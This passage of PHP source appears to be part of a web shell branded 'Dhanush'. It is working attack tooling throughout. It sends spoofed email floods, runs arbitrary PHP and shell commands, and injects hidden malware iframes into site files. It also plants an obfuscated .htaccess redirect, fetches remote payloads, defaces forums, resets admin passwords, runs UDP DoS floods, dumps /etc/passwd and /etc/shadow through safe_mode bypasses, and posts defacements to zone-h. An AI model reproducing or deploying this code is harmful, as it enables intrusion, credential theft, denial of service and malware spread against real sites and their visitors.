2277 {
2278 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
2279 {
2280 $times = $_POST['times'];
2281 while($times--)
2282 {
2283 if(isset($_POST['padding']))
2284 {
2285 $fromPadd = rand(0,9999);
2286 $subjectPadd = " -- ID : ".rand(0,9999999);
2287 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
2288
2289 }
2290 $from = "president$fromPadd@whitehouse.gov";
2291 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
2292 {
2293 $error = 1;
2294 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
2295 break;
2296 }
2297 }
2298 if($error != 1)
2299 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
2300 }
2301 }
2302 else if($_POST['mailfunction'] == "massmailing")
2303 {
2304 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
2305 {
2306 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
2307 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
2308 else
2309 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
2310 }
2311 }
2312}
2313else if(isset($_POST['code']))
2314{
2315 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
2316 {
2317 // FIlter Some Chars we dont need
2318 ?><br>
2319 <textarea name="code" class="box" cols="120" rows="10"><?php
2320 $code = str_replace("<?php","",$_POST['code']);
2321 $code = str_replace("<?","",$code);
2322 $code = str_replace("?>","",$code);
2323
2324 // Evaluate PHP CoDE!
2325 htmlspecialchars(eval($code));
2326 ?>
2327 </textarea><?php
2328 }
2329 else if($_POST['code'] != null && $_POST['intext'] == "false")
2330 {
2331 $code = str_replace("<?php","",$_POST['code']);
2332 $code = str_replace("<?","",$code);
2333 $code = str_replace("?>","",$code);
2334
2335 // Evaluate PHP CoDE!
2336 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
2337 }
2338}
2339else if(isset($_GET['infect']))
2340{
2341 $coun = 0;
2342 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
2343 foreach (glob($_GET['path'] . "*.php") as $injectj00)
2344 {
2345 if($injectj00 == __FILE__)
2346 continue;
2347 if($myfile=fopen($injectj00,'a'))
2348 {
2349 fputs($myfile, $str);
2350 fclose($myfile);
2351 $coun = 1;
2352 }
2353 }
2354 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
2355 {
2356 if($myfile=fopen($injectj00,'a'))
2357 {
2358 fputs($myfile, $str);
2359 fclose($myfile);
2360 $coun = 1;
2361 }
2362 }
2363 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
2364 {
2365 if($myfile=fopen($injectj00,'a'))
2366 {
2367 fputs($myfile, $str);
2368 fclose($myfile);
2369 $coun = 1;
2370 }
2371 }
2372
2373
2374 if($coun == 1)
2375 echo "<center>Done !!!!<center>";
2376 else
2377 echo "<center>Cannot open files !!!!<center>";
2378}
2379else if(isset($_GET['redirect']))
2380{
2381 if($myfile = fopen(".htaccess",'a'))
2382 {
2383 $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
2384 fwrite($myfile, gzuncompress(base64_decode($mal)));
2385 fwrite($myfile, "\n\r");
2386 fclose($myfile);
2387 echo "<center>Done !!!!<center>";
2388 }
2389 else
2390 echo "<center>Cannot open file !!!!<center>";
2391}
2392else if(isset($_GET['malware']))
2393{ ?>
2394 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
2395 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
2396 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
2397 <div id="showmal"></div>
2398 <?php
2399}
2400else if(isset($_GET['codeinsert']))
2401{
2402 if($file1 = fopen(".htaccess",'r'))
2403 {
2404 ?><div id="showcode"></div>
2405 <form method=post>
2406 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
2407 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
2408 </form>
2409 <?php }
2410 else
2411 echo "<center>Cannot Open File!!</center>";
2412}
2413else if(isset($_POST['getcode']))
2414{
2415 if($myfile = fopen(".htaccess",'a'))
2416 {
2417 fwrite($myfile, $_POST['getcode']);
2418 fwrite($myfile, "\n\r");
2419 fclose($myfile);
2420 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
2421 }
2422 else
2423 echo "Permission Denied";
2424}
2425else if(isset($_GET['uploadurl']))
2426{
2427 $functiontype = trim($_GET['functiontype']);
2428 $wurl = trim($_GET['wurl']);
2429 $path = magicboom($_GET['path']);
2430
2431 function remotedownload($cmd,$url)
2432 {
2433 $namafile = basename($url);
2434 switch($cmd)
2435 {
2436 case 'wwget':
2437 execmd(which('wget')." ".$url." -O ".$namafile);
2438 break;
2439 case 'wlynx':
2440 execmd(which('lynx')." -source ".$url." > ".$namafile);
2441 break;
2442 case 'wfread' :
2443 execmd($wurl,$namafile);
2444 break;
2445 case 'wfetch' :
2446 execmd(which('fetch')." -o ".$namafile." -p ".$url);
2447 break;
2448 case 'wlinks' :
2449 execmd(which('links')." -source ".$url." > ".$namafile);
2450 break;
2451 case 'wget' :
2452 execmd(which('GET')." ".$url." > ".$namafile);
2453 break;
2454 case 'wcurl' :
2455 execmd(which('curl')." ".$url." -o ".$namafile);
2456 break;
2457 default:
2458 break;
2459 }
2460 return $namafile;
2461 }
2462 $namafile = remotedownload($functiontype,$wurl);
2463 $fullpath = $path . $directorysperator . $namafile;
2464 if(is_file($fullpath))
2465 {
2466 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
2467 }
2468 else
2469 echo "<center>Failed to upload $namafile</center>";
2470}
2471else if(isset($_GET['createfolder']))
2472{
2473 if(!mkdir($_GET['createfolder']))
2474 echo "Failed To create";
2475 else
2476 echo "<font class=txt>Folder Created Successfully</font>";
2477}
2478else if(isset($_GET['selfkill']))
2479{
2480 if(unlink(__FILE__))
2481 echo "<br><center><font size=5>Good Bye......</font></center>";
2482 else
2483 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
2484}
2485else if(isset($_GET['Create']))
2486{
2487 ?>
2488 <form method="post">
2489 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
2490 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
2491 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
2492 </form>
2493
2494<?php }
2495else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2496{
2497 $content = $_POST['filecontent'];
2498 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2499 {
2500 fwrite($file_pointer, $content);
2501 fclose($file_pointer);
2502 echo "<font class=txt>File Created Successfully</font>";
2503 }
2504 else
2505 echo "Cannot Create File";
2506}
2507else if(isset($_REQUEST["defaceforum"]))
2508{
2509 ?>
2510 <center><div id="showdeface"></div>
2511 <font color="#FF0000" size="4">Forum Index Changer</font>
2512 <form action="<?php echo $self; ?>" method = "POST">
2513 <input type="hidden" name="forum">
2514 <input type="hidden" name="defaceforum">
2515 <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
2516 <tr>
2517 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
2518
2519 <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
2520 <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
2521 <td><b> Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2522
2523 <tr><td height="50" width="50%">Type :
2524 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
2525 <option value="vb">vbulletin</option>
2526 <option value="mybb">Mybb</option>
2527 <option value="smf">SMF</option>
2528 <option value="ipb">IPB</option>
2529 <option value="wp">Wordpress</option>
2530 <option value="joomla">Joomla</option>
2531 </select></td>
2532 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
2533
2534 </tr>
2535 <tr>
2536 <td height="167" width="50%" colspan=2>
2537 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
2538
2539 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
2540 <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
2541 </div>
2542
2543 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
2544 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
2545 </td>
2546 </tr>
2547 </table>
2548 </form>
2549 </center>
2550 <?php
2551 }
2552 else if(isset($_GET["passwordchange"]))
2553 {
2554 echo "<center>";
2555 ?>
2556 <div id="showchangepass"></div>
2557 <font color="#FF0000" size="4">Forum Password Changer</font>
2558 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
2559 <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
2560 <tr>
2561 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2562 <tr>
2563 <td height="50" width="50%">Type :
2564 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
2565 <option value="vb">vbulletin</option>
2566 <option value="mybb">Mybb</option>
2567 <option value="smf">SMF</option>
2568 <option value="ipb">IPB</option>
2569 <option value="phpbb">PHPBB</option>
2570 <option value="wp">Wordpress</option>
2571 <option value="joomla">Joomla</option>
2572 </select></td>
2573 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
2574 </tr>
2575 <tr>
2576 <td colspan=2 height="100" width="780">
2577
2578 <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
2579
2580 <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> <b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
2581
2582 <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
2583
2584 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
2585 </tr>
2586 </table>
2587 </form>
2588 </center>
2589 <?php
2590}
2591else if(isset($_GET['dosser']))
2592{
2593 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
2594 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
2595 {
2596 $IP=$_GET['ip'];
2597 $port=$_GET['port'];
2598 $executionTime = $_GET['exTime'];
2599 $no0fBytes = $_GET['no0fBytes'];
2600 $data = "";
2601 $timeout = $_GET['timeout'];
2602 $packets = 0;
2603 $counter = $no0fBytes;
2604 $maxTime = time() + $executionTime;;
2605 while($counter--)
2606 {
2607 $data .= "X";
2608 }
2609 $data .= " Dhanush";
2610
2611 while(1)
2612 {
2613 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
2614 if($socket)
2615 {
2616 fwrite($socket , $data);
2617 fclose($socket);
2618 $packets++;
2619 }
2620 if(time() >= $maxTime)
2621 {
2622 break;
2623 }
2624 }
2625 echo "Dos Completed!<br>";
2626 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
2627 echo "Total Number of Packets Sent : " . $packets . "<br />";
2628 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
2629 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
2630 }
2631}
2632else if(isset($_GET['fuzzer']))
2633{
2634 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
2635 {
2636 $IP=$_GET['ip'];
2637 $port=$_GET['port'];
2638 $times = $_GET['exTime'];
2639 $timeout = $_GET['timeout'];
2640 $send = 0;
2641 $ending = "";
2642 $multiplier = $_GET['multiplier'];
2643 $data = "";
2644 $mode="tcp";
2645 $data .= "GET /";
2646 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
2647 if($_GET['type'] == "tcp")
2648 {
2649 $mode = "tcp";
2650 }
2651
2652 while($multiplier--)
2653 {
2654 $data .= urlencode($_GET['no0fBytes']);
2655 }
2656 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
2657 $data .= "by-Dhanush".$ending;
2658 $length = strlen($data);
2659
2660
2661 echo "Sending Data :- <br /> <p align='center'>$data</p>";
2662
2663 for($i=0;$i<$times;$i++)
2664 {
2665 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
2666 if($socket)
2667 {
2668 fwrite($socket , $data , $length );
2669 fclose($socket);
2670 }
2671 }
2672 echo "Fuzzing Completed!<br>";
2673 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
2674 echo "Total Number of Packets Sent : " . $times . "<br />";
2675 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
2676 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
2677 }
2678}
2679else if(isset($_GET['bypassit']))
2680{
2681 if(isset($_GET['copy']))
2682 {
2683 if(@copy($_GET['copy'],"test1.php"))
2684 {
2685 $fh=fopen("test1.php",'r');
2686 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2687 @fclose($fh);
2688 unlink("test1.php");
2689 }
2690 }
2691 else if(isset($_GET['imap']))
2692 {
2693 $string = $_GET['imap'];
2694 echo "<textarea cols=120 rows=20 class=box readonly>";
2695 $stream = imap_open($string, "", "");
2696 $str = imap_body($stream, 1);
2697 echo "</textarea>";
2698 }
2699 else if(isset($_GET['sql']))
2700 {
2701 echo "<textarea cols=120 rows=20 class=box readonly>";
2702 $file=$_GET['sql'];
2703
2704 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2705 $mysql_files = explode(':', $mysql_files_str);
2706
2707 $sql = array (
2708 "USE $mdb",
2709 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2710 "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2711 . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
2712 . "ESCAPED BY '' "
2713 . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2714
2715 "SELECT a FROM $tbl LIMIT 1"
2716 );
2717 mysql_connect ($mhost, $muser, $mpass);
2718
2719 foreach ($sql as $statement) {
2720 $q = mysql_query ($statement);
2721
2722 if ($q == false) die (
2723 "FAILED: " . $statement . "\n" .
2724 "REASON: " . mysql_error () . "\n"
2725 );
2726
2727 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2728
2729 echo htmlspecialchars($r[0]);
2730 mysql_free_result ($q);
2731 }
2732 echo "</textarea>";
2733 }
2734 else if(isset($_GET['curl']))
2735 {
2736 $ch=curl_init("file://" . $_GET[curl]);
2737 curl_setopt($ch,CURLOPT_HEADERS,0);
2738 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2739 $file_out=curl_exec($ch);
2740 curl_close($ch);
2741 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2742 }
2743 else if(isset($_GET['include']))
2744 {
2745 if(file_exists($_GET['include']))
2746 {
2747 echo "<textarea cols=120 rows=20 class=box readonly>";
2748 @include($_GET['include']);
2749 echo "</textarea>";
2750 }
2751 else
2752 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
2753 }
2754 else if(isset($_GET['id']))
2755 {
2756 echo "<textarea cols=120 rows=20 class=box readonly>";
2757 for($uid=0;$uid<60000;$uid++)
2758 { //cat /etc/passwd
2759 $ara = posix_getpwuid($uid);
2760 if (!empty($ara))
2761 {
2762 while (list ($key, $val) = each($ara))
2763 {
2764 print "$val:";
2765 }
2766 print "\n";
2767 }
2768 }
2769 echo "</textarea>";
2770 break;
2771 }
2772 else if(isset($_GET['tempnam']))
2773 {
2774 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
2775 $fp = fopen ( $mytmp, 'r' );
2776 while(!feof($fp))
2777 echo fgets($fp);
2778 fclose ( $fp );
2779 }
2780 else if(isset($_GET['symlnk']))
2781 {
2782 echo "<textarea cols=120 rows=20 class=box readonly>";
2783 @mkdir("mydhanush",0777);
2784 @chdir("mydhanush");
2785 execmd("ln -s /etc/passwd");
2786
2787 echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
2788 echo "</textarea>";
2789 }
2790 if(isset($_GET['newtype']))
2791 {
2792 $filename = $_GET['newtype'];
2793 echo "<textarea cols=120 rows=20 class=box readonly>";
2794 if($_GET['optiontype'] == "xxd")
2795 echo execmd("xxd ".$filename);
2796 else if($_GET['optiontype'] == "rev")
2797 echo execmd("rev ".$filename);
2798 if($_GET['optiontype'] == "tac")
2799 echo execmd("tac ".$filename);
2800 if($_GET['optiontype'] == "more")
2801 echo execmd("more ".$filename);
2802 if($_GET['optiontype'] == "less")
2803 echo execmd("less ".$filename);
2804 echo "</textarea>";
2805 }
2806}
2807// Deface Website
2808else if(isset($_GET['deface']))
2809{
2810 $myfile = fopen($_GET['deface'],'w');
2811 if(fwrite($myfile, base64_decode($ind)))
2812 {fclose($myfile);
2813 echo "Index Defaced Successfully";}
2814 else
2815 echo "Donot have write permission";
2816}
2817else if(isset($_GET['perms']))
2818{
2819?>
2820 <form>
2821 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
2822 <table align="center" border="1" style="width:40%;border-color:#333333;">
2823 <tr>
2824 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
2825 </tr>
2826 <tr>
2827 <td colspan="2" align="center" style="height:60px">
2828 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
2829 </tr>
2830 </table>
2831
2832 </form>
2833 <?php
2834}
2835else if(isset($_GET["chmode"]))
2836{
2837 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
2838 {
2839 $perms = 0;
2840 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
2841 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
2842 if(@chmod($_GET['myfilename'],$perms))
2843 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
2844 else
2845 echo "<center><blink>Cannot Change File Permissions</blink></center>";
2846 }
2847}
2848else if(isset($_GET['rename']))
2849{
2850?>
2851 <form>
2852 <table border="0" cellpadding="3" cellspacing="3">
2853 <tr>
2854 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
2855 </tr>
2856 <tr>
2857 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
2858 </tr>
2859 <tr>
2860 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
2861 </tr>
2862 </table>
2863 </form>
2864 <?php
2865
2866}
2867else if(isset($_GET['renamemyfile']))
2868{
2869 if(isset($_GET['to']) && isset($_GET['file']))
2870 {
2871 if(!rename($_GET['file'], $_GET['to']))
2872 echo "Cannot Rename File";
2873 else
2874 echo "<font class=txt>File Renamed Successfully</font>";
2875
2876 }
2877}
2878else if(isset($_GET['open']))
2879{
2880 if(is_file($_GET['myfilepath']))
2881 {
2882 $owner = "0/0";
2883 if($os == "Linux")
2884 $owner = getOGid($_GET['myfilepath']);
2885 ?>
2886 <form>
2887 <table style="width:57%;">
2888 <tr align="left">
2889 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
2890 </tr>
2891 <tr>
2892 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2893 </tr>
2894 </table>
2895 <textarea name="content" rows="15" cols="100" class="box"><?php
2896 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
2897 if($content)
2898 {
2899 echo $content;
2900 }
2901 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2902 {
2903 if(filesize($_GET['myfilepath']) != 0 )
2904 {
2905 fopen($_GET['myfilepath']);
2906 while(!feof())
2907 {
2908 echo htmlspecialchars(fgets($_GET['myfilepath']));
2909 }
2910 }
2911 }
2912
2913 ?>
2914 </textarea><br />
2915 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2916 </form>
2917 <?php
2918 }
2919 else
2920 echo "File does not exist !!!!";
2921}
2922else if(isset($_POST['file']) && isset($_POST['content']))
2923{
2924 if(file_exists($_POST['file']))
2925 {
2926 $handle = fopen($_POST['file'],"w");
2927 if(fwrite($handle,$_POST['content']))
2928 echo "<font class=txt>File Saved Successfully!</font>";
2929 else
2930 echo "Cannot Write into File";
2931 }
2932 else
2933 {
2934 echo "File Name Specified does not exists!";
2935 }
2936}
2937else if(isset($_POST["SendNowToZoneH"]))
2938{
2939 $hacker = $_POST['defacer'];
2940 $method = $_POST['hackmode'];
2941 $neden = $_POST['reason'];
2942 $site = $_POST['domain'];
2943
2944 if (empty($hacker))
2945 {
2946 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
2947 }
2948 elseif($method == "--------SELECT--------")
2949 {
2950 die("<center><font size=3>[-] You Must Select The Method !</center>");
2951 }
2952 elseif($neden == "--------SELECT--------")
2953 {
2954 die("<center><font size=3>[-] You Must Select The Reason</center>");
2955 }
2956 elseif(empty($site))
2957 {
2958 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
2959 }
2960 // Zone-h Poster
2961 function ZoneH($url, $hacker, $hackmode,$reson, $site )
2962 {
2963 $k = curl_init();
2964 curl_setopt($k, CURLOPT_URL, $url);
2965 curl_setopt($k,CURLOPT_POST,true);
2966 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2967 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2968 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2969 $kubra = curl_exec($k);
2970 curl_close($k);
2971 return $kubra;
2972 }
2973
2974 $i = 0;
2975 $sites = explode("\n", $site);
2976 echo "<pre class=ml1 style='margin-top:5px'>";
2977 while($i < count($sites))
2978 {
2979 if(substr($sites[$i], 0, 4) != "http")
2980 {
2981 $sites[$i] = "http://".$sites[$i];
2982 }
2983 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2984 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
2985 ++$i;
2986 }
2987
2988 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2989}
2990else if(isset($_GET['executemycmd']))
2991{
2992 $comm = $_GET['executemycmd'];
2993 chdir($_GET['executepath']);
2994 echo shell_exec($comm);
2995}
2996// View Passwd file
2997else if(isset($_GET['passwd']))
2998{
2999 $test='';
3000 $tempp= tempnam($test, "cx");
3001 $get = "/etc/passwd";
3002 $name=@posix_getpwuid(@fileowner($get));
3003 $group=@posix_getgrgid(@filegroup($get));
3004 $owner = $name['name']. " / ". $group['name'];
3005 ?>
3006 <table style="width:57%;">
3007 <tr>
3008 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
3009 </tr>
3010 <tr>
3011 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3012 </tr>
3013 </table>
3014 <?php
3015 if(copy("compress.zlib://".$get, $tempp))
3016 {
3017 $fopenzo = fopen($tempp, "r");
3018 $freadz = fread($fopenzo, filesize($tempp));
3019 fclose($fopenzo);
3020 $source = htmlspecialchars($freadz);
3021 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
3022 unlink($tempp);
3023 }
3024 else
3025 {
3026 ?>
3027 <form>
3028 <input type="hidden" name="etcpasswd">
3029 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3030 <tr>
3031 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3032 </tr>
3033 <tr>
3034 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3035 </tr>
3036 <tr>
3037 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3038 </tr>
3039 </table><br>
3040 </form>
3041 <?php
3042 }
3043}
3044else if(isset($_GET['shadow']))
3045{
3046 $test='';
3047 $tempp= tempnam($test, "cx");
3048 $get = "/etc/shadow";
3049 if(copy("compress.zlib://".$get, $tempp))
3050 {
3051 $fopenzo = fopen($tempp, "r");
3052 $freadz = fread($fopenzo, filesize($tempp));
3053 fclose($fopenzo);
3054 $source = htmlspecialchars($freadz);
3055 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3056 unlink($tempp);
3057 }
3058}
3059else if(isset($_GET['bomb']))
3060{
3061 ?><div id="showmail"></div>
3062 <form>
3063 <table id="margins" style="width:100%;">
3064 <tr>
3065 <td style="width:30%;">To</td>
3066 <td>
3067 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3068 </td>
3069 </tr>
3070 <tr>
3071 <td style="width:30%;">Subject</td>
3072 <td>
3073 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
3074 </td>
3075 </tr>
3076 <tr>
3077 <td style="width:30%;">No. of Times</td>
3078 <td>
3079 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3080 </td>
3081 </tr>
3082 <tr>
3083 <td style="width:30%;">Pad your message (Less spam detection)</td>
3084 <td><input type="checkbox" name="padding"/></td>
3085 </tr>
3086 <tr>
3087 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3088 </tr>
3089 <tr>
3090 <td rowspan="2">
3091 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3092 </td>
3093 </tr>
3094 </table>
3095 </form>
3096 <?php
3097}
3098
3099//Mass Mailer
3100else if(isset($_GET['mail']))
3101{
3102 ?><div id="showmail"></div>
3103 <div align="left">
3104 <form>
3105 <table align="left" style="width:100%;">
3106 <tr>
